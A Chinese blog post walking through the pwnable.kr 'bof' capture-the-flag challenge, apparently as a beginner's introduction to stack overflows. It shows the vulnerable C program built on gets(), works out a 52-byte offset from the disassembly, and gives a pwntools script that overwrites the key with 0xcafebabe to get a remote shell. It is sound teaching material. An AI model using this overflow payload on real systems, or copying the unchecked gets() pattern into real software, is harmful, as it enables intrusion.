通过bof初识栈溢出

最新推荐文章于 2021-12-30 22:49:30 发布
最新推荐文章于 2021-12-30 22:49:30 发布
阅读量216 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45691294/article/details/110881152
版权

pwnable.kr中的bof也可以算是学习栈溢出的"hello world"
在这里插入图片描述
题目给出了程序下载地址和c的代码,并且给了程序的一个监听口,通过该端口即可连接到题目的环境
先分析一下C的代码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

看到主函数和自定义的func函数,main函数直接调用了func函数,传入了参数0xdeadbeef,主函数汇编之后为
在这里插入图片描述
跟入到func函数里看一下,先会通过gets得到overflowme的值,然后进行判断key == 0xcafebabe,如果条件正确则可得到shell
观察汇编代码也可以看到cmp比较指令和jne条件跳转指令,
在这里插入图片描述
在这里插入图片描述
我们只要让输入的值将key的值覆盖掉,满足条件即可get shell
那么就要知道key的位置和输入的位置
输入的位置在[ebp-2Ch],key的位置在[ebp+8h],+0x00000008 - (-0x0000002C) = 0x34 = 52,两者地址的距离为52个字节,因此使用52个‘A’覆盖之后再加上4字节的0xcafebabe,就可以了(注:ebp+8h刚好是第一个参数,可以看下面这幅图)
在这里插入图片描述

# -*- coding:utf-8 -*-  
import pwn
r = pwn.remote('pwnable.kr',9000)
r.send('a'*52+pwn.p32(0xcafebabe))
r.interactive()

在这里插入图片描述
可以先了解基础和函数调用约定,参考文章

沫忆末忆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
学习缓冲区溢出攻击的前提知识
weixin_46564355的博客
10-15 991
缓冲区溢出(Buffer overflow)攻击 方法是很久之前就发表出来的技术,但是至今为止仍依然被广泛使用。这其中最大的原因就是目前还有很多程序很容易遭受buffer overflow(BOF)攻击。到目前为止,有许多相关对缓冲区溢出的解决方法的文档,但是大部分文档只针对技术性的方法进行说明,对于其原理和系统构造的说明非常少。但是理解BOF最不能缺少的就是对计算机在运行过程中的关于数据和结构的存储方法、函数调用和返回过程以及函数执行过程底层的准确信息。
pwn之bof
jxz_dz的博客
11-04 935
有一两周没更新了,坚持... 接着前边继续第三篇bof. 这次让我们直接下载bof.c,以及bof文件.分析代码和文件,然后在pwnable.kr 9000执行,获取flag 1.先看下bof.c的代码: #include <stdio.h> #include <string.h> #include <stdlib.h> void func(i...
通过pwnable.kr从零学pwn
热门推荐
giantbranch的专栏
07-31 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的 挑战地址:http://pwnable.kr/play.php fd 首先不用说给了就直接连上去 看一下代码 重要函数:read ssize_t read(int fd,void *
pwn 练习笔记 暑假的第一天
SsMing的博客
07-14 436
pwnable  bof 源码如下#include &lt;stdio.h&gt;#include &lt;string.h&gt;#include &lt;stdlib.h&gt;void func(int key){    char overflowme[32];    printf("overflow me : ");    gets(overflowme);    // smash me!...
PWN-bof
MuMuLee_的博客
08-26 550
题目给出一个PWN文件和两个netcat端口 解题步骤 1、ubuntu ->下载PWN文件,找到文件所在位置打开终端-> file命令 看到是一个32位的ELF文件 2、回win10 ,分析漏洞类型 把pwn文件拖进32位的ida 查看main函数的反汇编代码 sub_8048573 用到read函数,看一下汇编代码 3、解题方法 构造payload=‘a’*个数+返回地址...
bof:缓冲区溢出
02-21
转炉缓冲区溢出设置以管理员身份打开Immunity Debugger 在Immunity Debugger中,为mona设置一个工作文件夹: !mona config -set workingfolder c:\mona\%p模糊测试在Kali中,创建fuzzer.py脚本并执行注意发送的最大...
bof.rar_BOF
最新发布
09-21
【标签】"bof" 可能用于标记这个示例与缓冲区溢出攻击无关,而是关于MFC按钮功能的学习资源。 【压缩包子文件的文件名称列表】包含两个文件: 1. "www.pudn.com.txt":这可能是一个链接或引用文件,通常在论坛或...
Java+opencv实现bof图像检索算法
05-22
然后,通过计算查询向量与数据集内所有图像的BoF向量的余弦相似度,找出最相似的10张图像。余弦相似度是衡量两个非零向量之间角度的度量,常用于衡量特征向量之间的相似性。 5. **Corel数据集** Corel数据集是一个...
bof_templates:Windows x86缓冲区溢出模板
02-14
OSCP的Windows x86缓冲区溢出模板 脚步 以管理员身份启动服务/应用并启动豁免 模糊输入确定溢出 使用msf-pattern_create -l 生成模式 获取EIP的十六进制值 使用msf-pattern_offset -l <LEN> -q 查找确切的偏移量msf-...
BOF图像匹配-Python代码-计算机视觉
05-23
BOF图像匹配-Python代码-计算机视觉】 在计算机视觉领域,图像匹配是一个核心任务,它涉及识别和比较两张或多张图片中的相似或相同部分。Bag of Visual Words(BoF)模型是一种常用于图像表示和匹配的技术,尤其...
0x03-逆向-BoF基础的基础
0pr
06-04 1050
目录 今日目标 深入 BoF BoF 的前世今生 BoF 的种类 BoF 的应对策略 物理寻址的应用 找到 Boot Sector 在内存中的前两个字节的位置 寄存器 寄存器的种类 通用寄存器 段寄存器 指针寄存器 索引寄存器 控制寄存器 段和段寄存器小结 完成任务 程序拆解及必要汇编指令 org 指令 jmp 指令 times 指令 pusha popa 指令 条件控制指令 其他必要的汇编指令 总结 参考链接 今日目标 今天细看了一下 narnia2(不知道这是什
bof_WriteUp(pwnable.kr_bof)缓冲区溢出简单利用
Hvnt3r的博客
07-14 928
bof(pwnable.kr_bof)缓冲区溢出简单利用 题目传送门:http://pwnable.kr/play.php 下载连接中的源代码和二进制文件后,查看源代码如下 #include &amp;amp;amp;lt;stdio.h&amp;amp;amp;gt; #include &amp;amp;amp;lt;string.h&amp;amp;amp;gt; #include &amp;amp;amp;lt;stdlib.h&amp;amp
PWN学习003 bof
05-10 157
先看程序 下载相应代码和程序。 查看源码。 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key) { char overflowme[32]; printf("overflow me...
乱七八糟的pwn入门(四)——3.bof
Z_Pathon的博客
08-14 359
审题 先来看题目: 终于要用到我最感兴趣的栈溢出啦,赶紧把两个文件都下下来,先来看C语言文件: 看了这段代码就知道要干嘛了,目标就是利用gets函数的漏洞,通过栈溢出把传入的key值覆盖,来进入系统的shell。 然后把可执行文件用IDA打开,这就要用到汇编知识了,首先查看main函数: 由main函数可见,在参数传递后,跳转到了fun...
PWN bof [pwnable.kr]CTF writeup题解系列3
重新启程
01-01 827
题目地址:http://pwnable.kr/play.php 先看看图标,挺有意思的小动物! 继续看题目内容: 下载相应的文件 root@mypwn:/ctf/work/pwnable.kr# wget http://pwnable.kr/bin/bof.c --2020-01-01 08:40:45-- http://pwnable.kr/bin/bof.c Resolv...
栈溢出漏洞及栈溢出攻击
guilanl的专栏
03-13 1万+
1. 栈溢出的原因 栈溢出(stack-based buffer overflows)算是安全界常见的漏洞。一方面因为程序员的疏忽,使用了 strcpy、sprintf 等不安全的函数,增加了栈溢出漏洞的可能。另一方面,因为栈上保存了函数的返回地址等信息,因此如果攻击者能任意覆盖栈上的数据,通常情况下就意味着他能修改程序的执行流程,从而造成更大的破坏。这种攻击方法就是栈溢出攻击(stack
vulnhub Tr0ll: 2
箭雨镜屋
12-30 2378
本文思路: nmap扫描---->dirb扫描发现robots---->dirb配合找到的字典爆破目录---->访问目录下载图片---->strings考察图片,发现新目录y0ur_self---->访问y0ur_self目录,获得字典answer.txt---->弱口令登录ftp---->用fcrackzip爆破lmao.zip密码---->通过密钥ssh登录,得到noob用户的shell---->linpeas.sh探测提权途径---->利用缓冲区溢出漏洞提权
oscp——bof——brainpan
王嘟嘟的博客
08-04 620
0x00 前言 学习brainpan,这个是看了前辈的教程才做出来的。 前辈地址:https://blog.csdn.net/zhalang8324/article/details/90477524 0x01 Wp 看了oscp的教程但是感觉始终不得其道,所以想要练习练习。 总结了一下流程,emmm基本就是以下流程 确定偏移量 确定JMP ESP 确定badchar shellcode加上 其实还是有很多疑问的 这里ida看到了这个 跟进,发现是一个strcpy的缓存区溢出 但是有一个问题就是,这里
pwnable.kr-bof WP
Casuall的博客
03-24 5415
pwnable.kr-bof   这道题是一个简单的缓冲器溢出的题,首先要做这道题要对函数调用栈有一定的了解。 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶;在函数调用结束时,栈顶的函数(callee)状态被弹出,栈...
Metasploit实战:Windows栈溢出攻击与反弹shell教程
接着,作者进行了一个简单的栈溢出实验,展示了如何通过Msfconsole(Metasploit框架的命令行界面)创建payload,让恶意代码能够通过溢出攻击覆盖目标程序的栈区域,进而控制程序流程。溢出攻击通常利用内存中的缓冲...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值